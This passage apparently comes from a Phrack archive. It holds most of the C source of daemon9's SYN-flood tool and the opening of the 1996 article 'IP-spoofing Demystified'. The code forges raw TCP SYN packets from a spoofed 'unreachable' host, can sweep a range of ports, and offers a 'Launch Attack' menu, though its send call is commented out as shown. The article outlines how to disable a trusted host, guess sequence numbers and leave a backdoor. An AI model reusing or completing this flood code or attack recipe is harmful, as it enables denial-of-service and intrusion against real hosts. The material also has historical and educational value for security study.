  11194.                 unreachable=nameResolve(optarg);
  11195.                 strcpy(u,optarg);
  11196.                 break;
  11197.             case 't':    /* Target host */
  11198.                  target=nameResolve(optarg);
  11199.                 strcpy(t,optarg);
  11200.                 break;
  11201.             case 'p':    /* Target port */
  11202.                 port=atoi(optarg);
  11203.                 break;
  11204.                 case '8':    /* infinity switch */
  11205.                 port=0;            
  11206.                 break;
  11207.             case 'a':    /* Amount of SYNs to send */
  11208.                 amount=atoi(optarg);
  11209.                 break;
  11210.                 default:    /* WTF? */
  11211.                       usage(argv[0]);
  11212.         }
  11213.     }    
  11214.  
  11215.     if(!port){
  11216.         printf("\n\nFlooding target: \t\t%u\nOn ports\t\t\t1-%d\nAmount: \t\t\t%u\nPuportedly from: \t\t%u \n",target,MAXPORT,amount,unreachable); 
  11217.           flood(sock1,unreachable,target,0,amount);
  11218.     }    
  11219.     else{
  11220.         printf("\n\nFlooding target: \t\t%u\nOn port: \t\t\t%u\nAmount: \t\t\t%u\nPuportedly from: \t\t%u \n",target,port,amount,unreachable); 
  11221.            flood(sock1,unreachable,target,port,amount);
  11222.     }
  11223.     syslog(LOG_LOCAL6|LOG_INFO,"FLOOD: PID: %d, User:%s Target:%s Unreach:%s Port:%d Number:%d\n",getpid(),passEnt->pw_name,t,u,port,amount);  
  11224.     printf(werd);
  11225.     exit(0);
  11226. }                    /* End main */
  11227.  
  11228. /*
  11229.  *     Authenticate.  Makes sure user is authorized to run program.
  11230.  *
  11231.  */
  11232. int authenticate(fd,nameID)
  11233. int fd;
  11234. char *nameID;
  11235. {
  11236.  
  11237.     char buf[BUFLEN+1];
  11238.     char workBuffer[10];
  11239.     int i=0,j=0;    
  11240.  
  11241.     while(read(fd,buf,sizeof(buf))){
  11242.         if(!(strstr(buf,nameID))){
  11243.             close(fd);
  11244.             syslog(LOG_LOCAL6|LOG_INFO,"Failed authentication for %s\n",nameID);  
  11245.             return(0);
  11246.         }
  11247.         else {
  11248.             close(fd);
  11249.             syslog(LOG_LOCAL6|LOG_INFO,"Successful start by %s, PID: %d\n",nameID,getpid());  
  11250.             return(1);
  11251.         }
  11252.     }
  11253. }
  11254.  
  11255.  
  11256. /*
  11257.  *    Flood.  This is main workhorse of the program.  IP and TCP header 
  11258.  *    construction occurs here, as does flooding.    
  11259.  */
  11260. void flood(int sock,unsigned sadd,unsigned dadd,u_short dport,int amount){
  11261.  
  11262.     unsigned short in_cksum(unsigned short *,int);
  11263.   
  11264.        struct packet{
  11265.               struct iphdr ip;
  11266.               struct tcphdr tcp;
  11267.        }packet;
  11268.    
  11269.     struct pseudo_header{        /* For TCP header checksum */
  11270.               unsigned int source_address;
  11271.               unsigned int dest_address;
  11272.               unsigned char placeholder;
  11273.               unsigned char protocol;
  11274.               unsigned short tcp_length;
  11275.               struct tcphdr tcp;
  11276.        }pseudo_header;
  11277.  
  11278.        struct sockaddr_in sin;        /* IP address information */
  11279.        register int i=0,j=0;        /* Counters */
  11280.     int tsunami=0;            /* flag */
  11281.     unsigned short sport=161+getpid();
  11282.  
  11283.     if(!dport){
  11284.         tsunami++;        /* GOD save them... */
  11285.         fprintf(stderr,"\nTSUNAMI!\n");
  11286.         fprintf(stderr,"\nflooding port:");    
  11287.     }
  11288.  
  11289.                /* Setup the sin struct with addressing information */
  11290.  
  11291.        sin.sin_family=AF_INET;        /* Internet address family */
  11292.        sin.sin_port=sport;        /* Source port */
  11293.        sin.sin_addr.s_addr=dadd;    /* Dest. address */
  11294.                 
  11295.             /* Packet assembly begins here */
  11296.  
  11297.                    /* Fill in all the TCP header information */
  11298.  
  11299.        packet.tcp.source=sport;    /* 16-bit Source port number */
  11300.        packet.tcp.dest=htons(dport);     /* 16-bit Destination port */
  11301.        packet.tcp.seq=49358353+getpid();    /* 32-bit Sequence Number */
  11302.        packet.tcp.ack_seq=0;        /* 32-bit Acknowledgement Number */
  11303.        packet.tcp.doff=5;        /* Data offset */
  11304.     packet.tcp.res1=0;        /* reserved */
  11305.     packet.tcp.res2=0;        /* reserved */    
  11306.        packet.tcp.urg=0;        /* Urgent offset valid flag */        
  11307.        packet.tcp.ack=0;        /* Acknowledgement field valid flag */
  11308.        packet.tcp.psh=0;        /* Push flag */
  11309.        packet.tcp.rst=0;        /* Reset flag */
  11310.        packet.tcp.syn=1;        /* Synchronize sequence numbers flag */
  11311.        packet.tcp.fin=0;        /* Finish sending flag */
  11312.        packet.tcp.window=htons(242); /* 16-bit Window size */
  11313.        packet.tcp.check=0;        /* 16-bit checksum (to be filled in below) */
  11314.        packet.tcp.urg_ptr=0;        /* 16-bit urgent offset */
  11315.  
  11316.                    /* Fill in all the IP header information */
  11317.    
  11318.        packet.ip.version=4;        /* 4-bit Version */
  11319.     packet.ip.ihl=5;        /* 4-bit Header Length */
  11320.        packet.ip.tos=0;        /* 8-bit Type of service */
  11321.        packet.ip.tot_len=htons(40);    /* 16-bit Total length */
  11322.        packet.ip.id=getpid();        /* 16-bit ID field */
  11323.        packet.ip.frag_off=0;        /* 13-bit Fragment offset */
  11324.        packet.ip.ttl=255;        /* 8-bit Time To Live */
  11325.        packet.ip.protocol=IPPROTO_TCP; /* 8-bit Protocol */
  11326.        packet.ip.check=0;        /* 16-bit Header checksum (filled in below) */
  11327.        packet.ip.saddr=sadd;        /* 32-bit Source Address */
  11328.        packet.ip.daddr=dadd;        /* 32-bit Destination Address */
  11329.  
  11330.             /* Psuedo-headers needed for TCP hdr checksum (they
  11331.             do not change and do not need to be in the loop) */
  11332.               
  11333.     pseudo_header.source_address=packet.ip.saddr;
  11334.           pseudo_header.dest_address=packet.ip.daddr;
  11335.           pseudo_header.placeholder=0;
  11336.           pseudo_header.protocol=IPPROTO_TCP;
  11337.           pseudo_header.tcp_length=htons(20);
  11338.  
  11339.     while(1){            /* Main loop */
  11340.         if(tsunami){
  11341.             if(j==MAXPORT){
  11342.                 tsunami=0;
  11343.                   break;
  11344.             }
  11345.             packet.tcp.dest=htons(++j);
  11346.             fprintf(stderr,"%d",j);
  11347.             fprintf(stderr,"%c",0x08);
  11348.             if(j>=10)fprintf(stderr,"%c",0x08);
  11349.             if(j>=100)fprintf(stderr,"%c",0x08);
  11350.             if(j>=1000)fprintf(stderr,"%c",0x08);
  11351.             if(j>=10000)fprintf(stderr,"%c",0x08);
  11352.  
  11353.         }
  11354.            for(i=0;i<amount;i++){    /* Flood loop */
  11355.  
  11356.                 /* Certian header fields should change */    
  11357.  
  11358.                   packet.tcp.source++;    /* Source port inc */
  11359.                   packet.tcp.seq++;    /* Sequence Number inc */
  11360.                   packet.tcp.check=0;    /* Checksum will need to change */
  11361.                   packet.ip.id++;        /* ID number */
  11362.                   packet.ip.check=0;    /* Checksum will need to change */
  11363.  
  11364.                   /* IP header checksum */
  11365.           
  11366.             packet.ip.check=in_cksum((unsigned short *)&packet.ip,20);
  11367.  
  11368.             /* Setup TCP headers for checksum */
  11369.  
  11370.                   bcopy((char *)&packet.tcp,(char *)&pseudo_header.tcp,20);
  11371.  
  11372.             /* TCP header checksum */
  11373.  
  11374.                   packet.tcp.check=in_cksum((unsigned short *)&pseudo_header,32);
  11375.  
  11376.             /* As it turns out, if we blast packets too fast, many
  11377.              get dropped, as the receiving kernel can't cope (at 
  11378.             least on an ethernet).  This value could be tweaked
  11379.             prolly, but that's up to you for now... */
  11380.         
  11381.             usleep(FLOODSLEEP);  
  11382.         
  11383.         /* This is where we sit back and watch it all come together */
  11384.               
  11385.             /*sendto(sock,&packet,40,0,(struct sockaddr *)&sin,sizeof(sin));*/
  11386.             if(!tsunami&&!KEEPQUIET)fprintf(stderr,".");
  11387.            }    
  11388.         if(!tsunami)break;
  11389.     }
  11390. }
  11391.  
  11392.  
  11393. /*
  11394.  *    IP Family checksum routine (from UNP)
  11395.  */
  11396. unsigned short in_cksum(unsigned short *ptr,int nbytes){
  11397.  
  11398.     register long           sum;            /* assumes long == 32 bits */
  11399.         u_short                 oddbyte;
  11400.         register u_short        answer;         /* assumes u_short == 16 bits */
  11401.  
  11402.         /*
  11403.          * Our algorithm is simple, using a 32-bit accumulator (sum),
  11404.          * we add sequential 16-bit words to it, and at the end, fold back
  11405.          * all the carry bits from the top 16 bits into the lower 16 bits.
  11406.          */
  11407.  
  11408.         sum = 0;
  11409.         while (nbytes > 1)  {
  11410.                 sum += *ptr++;
  11411.                 nbytes -= 2;
  11412.         }
  11413.  
  11414.                                 /* mop up an odd byte, if necessary */
  11415.         if (nbytes == 1) {
  11416.                 oddbyte = 0;            /* make sure top half is zero */
  11417.                 *((u_char *) &oddbyte) = *(u_char *)ptr;   /* one byte only */
  11418.                 sum += oddbyte;
  11419.         }
  11420.  
  11421.         /*
  11422.          * Add back carry outs from top 16 bits to low 16 bits.
  11423.          */
  11424.  
  11425.         sum  = (sum >> 16) + (sum & 0xffff);    /* add high-16 to low-16 */
  11426.         sum += (sum >> 16);                     /* add carry */
  11427.         answer = ~sum;          /* ones-complement, then truncate to 16 bits */
  11428.         return(answer);
  11429. }
  11430.  
  11431.  
  11432. /*
  11433.  *    Converts IP addresses
  11434.  */
  11435. unsigned nameResolve(char *hostname){
  11436.  
  11437.     struct in_addr addr;
  11438.        struct hostent *hostEnt;
  11439.  
  11440.        if((addr.s_addr=inet_addr(hostname))==-1){
  11441.              if(!(hostEnt=gethostbyname(hostname))){
  11442.                  fprintf(stderr,"Name lookup failure: `%s`\n",hostname);
  11443.                  exit(0);
  11444.               }
  11445.               bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length);
  11446.        }
  11447.        return addr.s_addr;
  11448. }
  11449.  
  11450.  
  11451. /*
  11452.  *    Menu function.  Nothing suprising here.  Except that one thing.
  11453.  */
  11454. void menu(sock1,nameID)
  11455. int sock1;
  11456. char *nameID;
  11457. {
  11458.     int slickPing(int,int,char *);
  11459.     void flood(int,unsigned,unsigned,u_short,int);
  11460.     unsigned nameResolve(char *);
  11461.     void demon(int,char *,char *,int,int,int,int);
  11462.  
  11463.     int i,sock2,menuLoop=1,icmpAmt,port,amount,interval,ttl;
  11464.     char optflags[7]={0};        /* So we can keep track of the options */
  11465.     static char tmp[MENUBUF+1]={0},target[MENUBUF+1]={0},unreach[MENUBUF+1]={0};    
  11466.  
  11467.     while(menuLoop){        
  11468.         printf("\n\n\t\t\t[   SYNflood Menu   ]\n\t\t\t    [  daemon9  ]\n\n");
  11469.         if(!optflags[0])printf("1\t\tEnter target host\n");
  11470.         else printf("[1]\t\tTarget:\t\t\t%s\n",target);
  11471.         if(!optflags[1])printf("2\t\tEnter source (unreachable) host\n");
  11472.         else printf("[2]\t\tUnreachable:\t\t%s\n",unreach);
  11473.         if(!optflags[2])printf("3\t\tSend ICMP_ECHO(s) to unreachable\n");
  11474.         else printf("[3]\t\tUnreachable host:\tverified unreachable\n");
  11475.         if(!optflags[3])printf("4\t\tEnter port number to flood\n");
  11476.         else if(port)printf("[4]\t\tFlooding:\t\t%d\n",port);
  11477.         else printf("[4]\t\tFlooding:\t\t1-1024\n");
  11478.         if(!optflags[4])printf("5\t\tEnter number of SYNs\n");
  11479.         else printf("[5]\t\tNumber SYNs:\t\t%d\n",amount);
  11480.         printf("\n6\t\tQuit\n");
  11481.         if(optflags[0]&&optflags[1]&&optflags[3]&&optflags[4])printf("7\t\tLaunch Attack\n");
  11482.         if(optflags[0]&&optflags[1]&&optflags[3]&&optflags[4])printf("8\t\tDaemonize\n");
  11483.         printf("\n\n\n\n\n\n\n\n\n\n\n\n");
  11484.         fgets(tmp,BUFLEN/2,stdin);    /* tempered input */
  11485.         switch(atoi(tmp)){
  11486.             case 1:    
  11487.                 printf("[hostname]-> ");
  11488.                 fgets(target,MENUBUF,stdin);
  11489.                 i=0;
  11490.                 if(target[0]=='\n')break;
  11491.                 while(target[i]!='\n')i++;
  11492.                 target[i]=0;
  11493.                 optflags[0]=1;            
  11494.                 break;
  11495.             case 2:
  11496.                 printf("[hostname]-> ");
  11497.                 fgets(unreach,MENUBUF,stdin);
  11498.                 i=0;
  11499.                 if(unreach[0]=='\n')break;
  11500.                 while(unreach[i]!='\n')i++;
  11501.                 unreach[i]=0;
  11502.                 optflags[1]=1;
  11503.                 break;
  11504.             case 3:
  11505.                 if(!optflags[1]){
  11506.                     fprintf(stderr,"Um, enter a host first\n");
  11507.                     usleep(MENUSLEEP);
  11508.                     break;
  11509.                 }
  11510.                         /* Raw ICMP socket */
  11511.                    if((sock2=socket(AF_INET,SOCK_RAW,IPPROTO_ICMP))<0){
  11512.                        perror("\nHmmm.... socket problems\n");
  11513.                           exit(1);
  11514.                    }        
  11515.                 printf("[number of ICMP_ECHO's]-> ");
  11516.                 fgets(tmp,MENUBUF,stdin);
  11517.                 if(!(icmpAmt=atoi(tmp)))break;
  11518.                 if(slickPing(icmpAmt,sock2,unreach)){
  11519.                     fprintf(stderr,"Host is reachable... Pick a new one\n");
  11520.                     sleep(1);
  11521.                     optflags[1]=0;
  11522.                     optflags[2]=0;
  11523.                     HANDLERCODE=1;
  11524.                     close(sock2);
  11525.                     break;
  11526.                 }
  11527.                 optflags[2]=1;
  11528.                 close(sock2);
  11529.                 break;
  11530.             case 4: 
  11531.                 printf("[port number]-> ");
  11532.                 fgets(tmp,MENUBUF,stdin);
  11533.                 port=atoi(tmp);
  11534.                 optflags[3]=1;
  11535.                 break;
  11536.             case 5:
  11537.                 printf("[number of SYNs]-> ");
  11538.                 fgets(tmp,MENUBUF,stdin);
  11539.                 if(!(amount=atoi(tmp)))break;
  11540.                 optflags[4]=1;
  11541.                 break;
  11542.             case 6:
  11543.                 menuLoop--;
  11544.                 break;
  11545.             case 7:
  11546.                 if(optflags[0]&&optflags[1]&&optflags[3]&&optflags[4]){
  11547.                     syslog(LOG_LOCAL6|LOG_INFO,"FLOOD: PID: %d, User:%s Target:%s Unreach:%s Port:%d Number:%d\n",getpid(),nameID,target,unreach,port,amount);  
  11548.                     flood(sock1,nameResolve(unreach),nameResolve(target),port,amount);
  11549.                     menuLoop--;
  11550.                 }
  11551.                 else{
  11552.                     fprintf(stderr,"Illegal option --try again\n");
  11553.                     usleep(MENUSLEEP);
  11554.                 }
  11555.                 break;
  11556.             case 8:
  11557.                 if(optflags[0]&&optflags[1]&&optflags[3]&&optflags[4]){
  11558.                     if(!port){
  11559.                         fprintf(stderr,"Cannot set infinity flag in daemon mode.  Sorry.\n");
  11560.                         usleep(MENUSLEEP*2);
  11561.                         break;
  11562.                     }
  11563.                     printf("[packet sending interval in seconds {80}]-> ");
  11564.                     fgets(tmp,MENUBUF,stdin);
  11565.                     if(!(interval=atoi(tmp)))interval=80;
  11566.                     printf("[time for daemon to live in whole hours(0=forever)]-> ");
  11567.                     fgets(tmp,MENUBUF,stdin);
  11568.                     ttl=atoi(tmp);
  11569.                     syslog(LOG_LOCAL6|LOG_INFO,"DFLOOD: PID: %d, User:%s Target:%s Unreach:%s Port:%d Number:%d Interval: %d TTL: %d\n",getpid(),nameID,target,unreach,port,amount,interval,ttl);  
  11570.                     demon(sock1,unreach,target,port,amount,interval,ttl);
  11571.                     exit(0);
  11572.                 }
  11573.                 else{
  11574.                     fprintf(stderr,"Illegal option --try again\n");
  11575.                     usleep(MENUSLEEP);
  11576.                 }
  11577.                 break;
  11578.                                 
  11579.             default:
  11580.                 fprintf(stderr,"Illegal option --try again\n");
  11581.                 usleep(MENUSLEEP);
  11582.         }
  11583.  
  11584.     }
  11585.     printf("\n");
  11586.     printf(werd);
  11587.     return;
  11588. }
  11589.  
  11590.  
  11591. /*
  11592.  *    SlickPing.  A quick and dirty ping hack.  Sends <amount> ICMP_ECHO 
  11593.  *    packets and waits for a reply on any one of them...  It has to check 
  11594.  *    to make sure the ICMP_ECHOREPLY is actually meant for us, as raw ICMP 
  11595.  *    sockets get ALL the ICMP traffic on a host, and someone could be 
  11596.  *    pinging some other host and we could get that ECHOREPLY and foul 
  11597.  *    things up for us.
  11598.  */
  11599. int slickPing(amount,sock,dest)
  11600. int amount,sock;
  11601. char *dest;
  11602. {
  11603.  
  11604.     int alarmHandler();
  11605.     unsigned nameResolve(char *);
  11606.     
  11607.     register int retcode,j=0;
  11608.     struct icmphdr *icmp;
  11609.     struct sockaddr_in sin;
  11610.     unsigned char sendICMPpak[MAXPAK]={0};
  11611.     unsigned short pakID=getpid()&0xffff;
  11612.  
  11613.     struct ippkt{
  11614.            struct iphdr ip;
  11615.            struct icmphdr icmp;
  11616.            char buffer[MAXPAK];
  11617.     }pkt;
  11618.  
  11619.     bzero((char *)&sin,sizeof(sin));
  11620.     sin.sin_family=AF_INET;
  11621.     sin.sin_addr.s_addr=nameResolve(dest);
  11622.  
  11623.         /* ICMP Packet assembly  */
  11624.     /* We let the kernel create our IP header as it is legit */
  11625.  
  11626.     icmp=(struct icmphdr *)sendICMPpak;
  11627.     icmp->type=ICMP_ECHO;            /* Requesting an Echo */
  11628.     icmp->code=0;                /* 0 for ICMP ECHO/ECHO_REPLY */
  11629.     icmp->un.echo.id=pakID;            /* To identify upon return */    
  11630.     icmp->un.echo.sequence=0;        /* Not used for us */
  11631.     icmp->checksum=in_cksum((unsigned short *)icmp,64);
  11632.  
  11633.     fprintf(stderr,"sending ICMP_ECHO packets: ");
  11634.     for(;j<amount;j++){
  11635.         usleep(ICMPSLEEP);        /* For good measure */
  11636.         retcode=sendto(sock,sendICMPpak,64,0,(struct sockaddr *)&sin,sizeof(sin));
  11637.         if(retcode<0||retcode!=64)
  11638.             if(retcode<0){
  11639.                 perror("ICMP sendto err");
  11640.                 exit(1);
  11641.             }
  11642.             else fprintf(stderr,"Only wrote %d bytes",retcode);
  11643.         else fprintf(stderr,".");
  11644.     }
  11645.     HANDLERCODE=1;
  11646.     signal(SIGALRM,alarmHandler);    /* catch the ALARM and handle it */
  11647.     fprintf(stderr,"\nSetting alarm timeout for 10 seconds...\n");
  11648.     alarm(10);    /* ALARM is set b/c read() will block forever if no */
  11649.     while(1){    /* packets arrive...   (which is what we want....)  */
  11650.         read(sock,(struct ippkt *)&pkt,MAXPAK-1);
  11651.           if(pkt.icmp.type==ICMP_ECHOREPLY&&icmp->un.echo.id==pakID){
  11652.             if(!HANDLERCODE)return(0);
  11653.             return(1);
  11654.         }
  11655.       }    
  11656. }
  11657.  
  11658.  
  11659. /* 
  11660.  *    SIGALRM signal handler.  Souper simple.
  11661.  */ 
  11662. int alarmHandler(){
  11663.  
  11664.     HANDLERCODE=0;        /* shame on me for using global vars */
  11665.     alarm(0);
  11666.     signal(SIGALRM,SIG_DFL);
  11667.     return(0);
  11668. }
  11669.  
  11670.  
  11671. /*
  11672.  *    Usage function...  
  11673.  */
  11674. void usage(nomenclature)
  11675. char *nomenclature;
  11676. {
  11677.     fprintf(stderr,"\n\nUSAGE: %s \n\t-s unreachable_host \n\t-t target_host \n\t-p port [-8 (infinity switch)] \n\t-a amount_of_SYNs\n",nomenclature);
  11678.           exit(0);
  11679. }
  11680.  
  11681.  
  11682. /*
  11683.  *    Demon.  Backgrounding procedure and looping stuff.  
  11684.  */                    
  11685.  
  11686. void demon(sock,unreachable,target,port,amount,interval,ttl)
  11687. int sock;
  11688. char *unreachable;
  11689. char *target;
  11690. int port;
  11691. int amount;
  11692. int interval;
  11693. int ttl;
  11694. {
  11695.     fprintf(stderr,"\nSorry Daemon mode not available in this version\n");
  11696.     exit(0);
  11697.  
  11698. }
  11699.     
  11700.                              ==Phrack Magazine==
  11701.  
  11702.              Volume Seven, Issue Forty-Eight, File 14 of 18
  11703.  
  11704.  
  11705.              [ IP-spoofing Demystified ]
  11706.               (Trust-Relationship Exploitation)
  11707.  
  11708.  
  11709.             by daemon9 / route / infinity
  11710.                  for Phrack Magazine
  11711.               June 1996 Guild Productions, kid
  11712.  
  11713.                comments to route@infonexus.com
  11714.  
  11715.  
  11716.         The purpose of this paper is to explain IP-spoofing to the
  11717. masses.  It assumes little more than a working knowledge of Unix and
  11718. TCP/IP.  Oh, and that yur not a moron...
  11719.         IP-spoofing is complex technical attack that is made up of
  11720. several components.  (In actuality, IP-spoofing is not the attack, but
  11721. a step in the attack.  The attack is actually trust-relationship
  11722. exploitation.  However, in this paper,  IP-spoofing will refer to the
  11723. whole attack.)  In this paper, I will explain the attack in detail,
  11724. including the relevant operating system and networking information.
  11725.  
  11726.  
  11727.                 [SECTION I.  BACKGROUND INFORMATION]
  11728.  
  11729.  
  11730.         --[ The Players ]--
  11731.  
  11732.  
  11733.         A:      Target host
  11734.         B:      Trusted host
  11735.         X:      Unreachable host
  11736.         Z:      Attacking host
  11737.         (1)2:   Host 1 masquerading as host 2
  11738.  
  11739.  
  11740.         --[ The Figures ]--
  11741.  
  11742.  
  11743.         There are several figures in the paper and they are to be
  11744. interpreted as per the following example:
  11745.  
  11746. ick   host a      control     host b
  11747. 1       A       ---SYN--->      B
  11748.  
  11749. tick:   A tick of time.  There is no distinction made as to *how*
  11750. much time passes between ticks, just that time passes.  It's generally
  11751. not a great deal.
  11752. host a: A machine particpating in a TCP-based conversation.
  11753. control: This field shows any relevant control bits set in the TCP
  11754. header and the direction the data is flowing
  11755. host b: A machine particpating in a TCP-based conversation.
  11756.  
  11757. In this case, at the first refrenced point in time host a is sending
  11758. a TCP segment to host b with the SYN bit on.  Unless stated, we are
  11759. generally not concerned with the data portion of the TCP segment.
  11760.  
  11761.  
  11762.         --[ Trust Relationships ]--
  11763.  
  11764.  
  11765.         In the Unix world, trust can be given all too easily.  Say you
  11766. have an account on machine A, and on machine B.  To facilitate going
  11767. betwixt the two with a minimum amount of hassle, you want to setup a
  11768. full-duplex trust relationship between them.  In your home directory
  11769. at A you create a .rhosts file: `echo "B username" > ~/.rhosts` In
  11770. your home directory at B you create a .rhosts file: `echo "A username"
  11771. > ~/.rhosts` (Alternately, root can setup similar rules in
  11772. /etc/hosts.equiv, the difference being that the rules are hostwide,
  11773. rather than just on an individual basis.)  Now, you can use any of the
  11774. r* commands without that annoying hassle of password authentication.
  11775. These commands will allow address-based authentication, which will
  11776. grant or deny access based off of the IP address of the service
  11777. requestor.
  11778.  
  11779.  
  11780.         --[ Rlogin ]--
  11781.  
  11782.  
  11783.         Rlogin is a simple client-server based protocol that uses TCP
  11784. as it's transport.  Rlogin allows a user to login remotely from one
  11785. host to another, and, if the target machine trusts the other, rlogin
  11786. will allow the convienience of not prompting for a password.  It will
  11787. instead have authenticated the client via the source IP address.  So,
  11788. from our example above, we can use rlogin to remotely login to A from
  11789. B (or vice-versa) and not be prompted for a password.
  11790.  
  11791.  
  11792.         --[ Internet Protocol ]--
  11793.  
  11794.  
  11795.         IP is the connectionless, unreliable network protocol in the
  11796. TCP/IP suite.  It has two 32-bit header fields to hold address
  11797. information.  IP is also the busiest of all the TCP/IP protocols as
  11798. almost all TCP/IP traffic is encapsulated in IP datagrams.  IP's job
  11799. is to route packets around the network.  It provides no mechanism for
  11800. reliability or accountability, for that, it relies on the upper
  11801. layers.  IP simply sends out datagrams and hopes they make it intact.
  11802. If they don't, IP can try to send an ICMP error message back to the
  11803. source, however this packet can get lost as well.  (ICMP is Internet
  11804. Control Message Protocol and it is used to relay network conditions
  11805. and different errors to IP and the other layers.)  IP has no means to
  11806. guarantee delivery.  Since IP is connectionless, it does not maintain
  11807. any connection state information.  Each IP datagram is sent out without
  11808. regard to the last one or the next one.  This, along with the fact that
  11809. it is trivial to modify the IP stack to allow an arbitrarily choosen IP
  11810. address in the source (and destination) fields make IP easily subvertable.
  11811.  
  11812.  
  11813.         --[ Transmission Control Protocol ]--
  11814.  
  11815.  
  11816.         TCP is the connection-oriented, reliable transport protocol
  11817. in the TCP/IP suite.  Connection-oriented simply means that the two
  11818. hosts participating in a discussion must first establish a connection
  11819. before data may change hands.  Reliability is provided in a number of
  11820. ways but the only two we are concerned with are data sequencing and
  11821. acknowledgement.  TCP assigns sequence numbers to every segment and
  11822. acknowledges any and all data segments recieved from the other end.
  11823. (ACK's consume a sequence number, but are not themselves ACK'd.)
  11824. This reliability makes TCP harder to fool than IP.
  11825.  
  11826.  
  11827.         --[ Sequence Numbers, Acknowledgements and other flags ]--
  11828.  
  11829.  
  11830.         Since TCP is reliable, it must be able to recover from
  11831. lost, duplicated, or out-of-order data.  By assigning a sequence
  11832. number to every byte transfered, and requiring an acknowledgement from
  11833. the other end upon receipt, TCP can guarantee reliable delivery.  The
  11834. receiving end uses the sequence numbers to ensure proper ordering of
  11835. the data and to eliminate duplicate data bytes.
  11836.         TCP sequence numbers can simply be thought of as 32-bit
  11837. counters.  They range from 0 to 4,294,967,295.  Every byte of
  11838. data exchanged across a TCP connection (along with certain flags)
  11839. is sequenced.  The sequence number field in the TCP header will
  11840. contain the sequence number of the *first* byte of data in the
  11841. TCP segment.  The acknowledgement number field in the TCP header
  11842. holds the value of next *expected* sequence number, and also
  11843. acknowledges *all* data up through this ACK number minus one.
  11844.         TCP uses the concept of window advertisement for flow
  11845. control.  It uses a sliding window to tell the other end how much
  11846. data it can buffer.  Since the window size is 16-bits a receiving TCP
  11847. can advertise up to a maximum of 65535 bytes.  Window advertisement
  11848. can be thought of an advertisment from one TCP to the other of how
  11849. high acceptable sequence numbers can be.
  11850.         Other TCP header flags of note are RST (reset), PSH (push)
  11851. and FIN (finish).  If a RST is received, the connection is
  11852. immediately torn down.  RSTs are normally sent when one end
  11853. receives a segment that just doesn't jive with current connection
  11854. (we will encounter an example below).  The PSH flag tells the
  11855. reciever to pass all the data is has queued to the aplication, as
  11856. soon as possible.  The FIN flag is the way an application begins a
  11857. graceful close of a connection (connection termination is a 4-way
  11858. process). When one end recieves a FIN, it ACKs it, and does not
  11859. expect to receive any more data (sending is still possible, however).
  11860.  
  11861.  
  11862.         --[ TCP Connection Establishment ]--
  11863.  
  11864.  
  11865.         In order to exchange data using TCP, hosts must establish a
  11866. a connection.  TCP establishes a connection in a 3 step process called
  11867. the 3-way handshake.  If machine A is running an rlogin client and
  11868. wishes to conect to an rlogin daemon on machine B, the process is as
  11869. follows:
  11870.  
  11871.                 fig(1)
  11872.  
  11873. 1       A       ---SYN--->      B
  11874.  
  11875. 2       A    <---SYN/ACK---     B
  11876.  
  11877. 3       A       ---ACK--->      B
  11878.  
  11879.  
  11880. At (1) the client is telling the server that it wants a connection.
  11881. This is the SYN flag's only purpose.  The client is telling the
  11882. server that the sequence number field is valid, and should be checked.
  11883. The client will set the sequence number field in the TCP header to
  11884. it's ISN (initial sequence number).  The server, upon receiving this
  11885. segment (2) will respond with it's own ISN (therefore the SYN flag is
  11886. on) and an ACKnowledgement of the clients first segment (which is the
  11887. client's ISN+1).  The client then ACK's the server's ISN (3).  Now,
  11888. data transfer may take place.
  11889.  
  11890.  
  11891.         --[ The ISN and Sequence Number Incrementation ]--
  11892.  
  11893.  
  11894.         It is important to understand how sequence numbers are
  11895. initially choosen, and how they change with respect to time.  The
  11896. initial sequence number when a host is bootstraped is initialized
  11897. to 1. (TCP actually calls this variable 'tcp_iss' as it is the initial
  11898. *send* sequence number.  The other sequence number variable,
  11899. 'tcp_irs' is the initial *receive* sequence number and is learned
  11900. during the 3-way connection establishment.  We are not going to worry
  11901. about the distinction.)  This practice is wrong, and is acknowledged
  11902. as so in a comment the tcp_init() function where it appears.  The ISN
  11903. is incremented by 128,000 every second, which causes the 32-bit ISN
  11904. counter to wrap every 9.32 hours if no connections occur.  However,
  11905. each time a connect() is issued, the counter is incremented by
  11906. 64,000.
  11907.         One important reason behind this predictibility is to
  11908. minimize the chance that data from an older stale incarnation
  11909. (that is, from the same 4-tuple of the local and remote
  11910. IP-addresses TCP ports) of the current connection could arrive
  11911. and foul things up.  The concept of the 2MSL wait time applies
  11912. here, but is beyond the scope of this paper.  If sequence
  11913. numbers were choosen at random when a connection arrived, no
  11914. guarantees could be made that the sequence numbers would be different
  11915. from a previous incarnation.  If some data that was stuck in a
  11916. routing loop somewhere finally freed itself and wandered into the new
  11917. incarnation of it's old connection, it could really foul things up.
  11918.  
  11919.  
  11920.         --[ Ports ]--
  11921.  
  11922.  
  11923.         To grant simultaneous access to the TCP module, TCP provides
  11924. a user interface called a port.  Ports are used by the kernel to
  11925. identify network processes.  These are strictly transport layer
  11926. entities (that is to say that IP could care less about them).
  11927. Together with an IP address, a TCP port provides provides an endpoint
  11928. for network communications.  In fact, at any given moment *all*
  11929. Internet connections can be described by 4 numbers: the source IP
  11930. address and source port and the destination IP address and destination
  11931. port.  Servers are bound to 'well-known' ports so that they may be
  11932. located on a standard port on different systems.  For example, the
  11933. rlogin daemon sits on TCP port 513.
  11934.  
  11935.  
  11936.                 [SECTION II.  THE ATTACK]
  11937.  
  11938.  
  11939.         ...The devil finds work for idle hands....
  11940.  
  11941.  
  11942.         --[ Briefly... ]--
  11943.  
  11944.  
  11945.         IP-spoofing consists of several steps, which I will
  11946. briefly outline here, then explain in detail.  First, the target host
  11947. is choosen.  Next, a pattern of trust is discovered, along with a
  11948. trusted host.  The trusted host is then disabled, and the target's TCP
  11949. sequence numbers are sampled.  The trusted host is impersonated, the
  11950. sequence numbers guessed, and a connection attempt is made to a
  11951. service that only requires address-based authentication.  If
  11952. successful, the attacker executes a simple command to leave a
  11953. backdoor.
  11954.  
  11955.  
  11956.         --[ Needful Things ]--
  11957.  
  11958.  
  11959.         There are a couple of things one needs to wage this attack:
  11960.  
  11961.                 (1) brain, mind, or other thinking device
  11962.                 (1) target host
  11963.                 (1) trusted host
  11964.                 (1) attacking host (with root access)
  11965.                 (1) IP-spoofing software
  11966.  
  11967. Generally the attack is made from the root account on the attacking
  11968. host against the root account on the target.  If the attacker is
  11969. going to all this trouble, it would be stupid not to go for root.
  11970. (Since root access is needed to wage the attack, this should not
  11971. be an issue.)
  11972.  
  11973.  
  11974.         --[ IP-Spoofing is a 'Blind Attack' ]--
  11975.  
  11976.  
